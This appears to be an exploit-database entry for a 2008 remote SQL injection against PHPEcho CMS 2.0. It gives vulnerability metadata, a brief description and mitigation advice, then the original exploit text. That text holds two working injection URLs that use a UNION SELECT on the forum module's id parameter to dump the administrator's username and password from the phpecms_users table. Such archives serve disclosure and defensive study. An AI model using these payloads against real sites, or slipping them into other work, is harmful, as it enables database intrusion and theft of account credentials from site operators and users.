header-logo
Suggest Exploit
vendor:
PHPEchoCM
by:
Stack-Terrorist
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPEchoCM
Affected Version From: 2
Affected Version To: 2
Patch Exists: YES
Related CWE: N/A
CPE: a:phpecho:phpecho_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

PHPEcho CMS Remote SQL Injection Exploit

A remote SQL injection vulnerability exists in PHPEcho CMS version 2.0. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.
Source

Exploit-DB raw data:

#########################################################################
    PHPEcho CMS Remote SQL Injection Exploit
#########################################################################
## Product:       PHPEchoCM
## License:       GPL
## For version:   2.0 
## AUTHOR : Stack-Terrorist [ v40]
## HOME : http://v4-team.com
## EMAIL: v.4@hotmail.fr & dj-moad@hotmail.fr
## download script : http://sourceforge.net/project/showfiles.php?group_id=186100

## EXPLOITS :
username :
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,username,3,4%20from%20phpecms_users%20where%20id=1/*
password :
http://server.com/Path/index.php?module=forum&show=section&id=-1%20union%20select%201,password,3,4%20from%20phpecms_users%20where%20id=1/*

## GREETZ  : All members v4 Team & no-hack & tryag & soqor
#########################################################################
         PHPEcho CMS Remote SQL Injection Exploit
#########################################################################

# milw0rm.com [2008-01-17]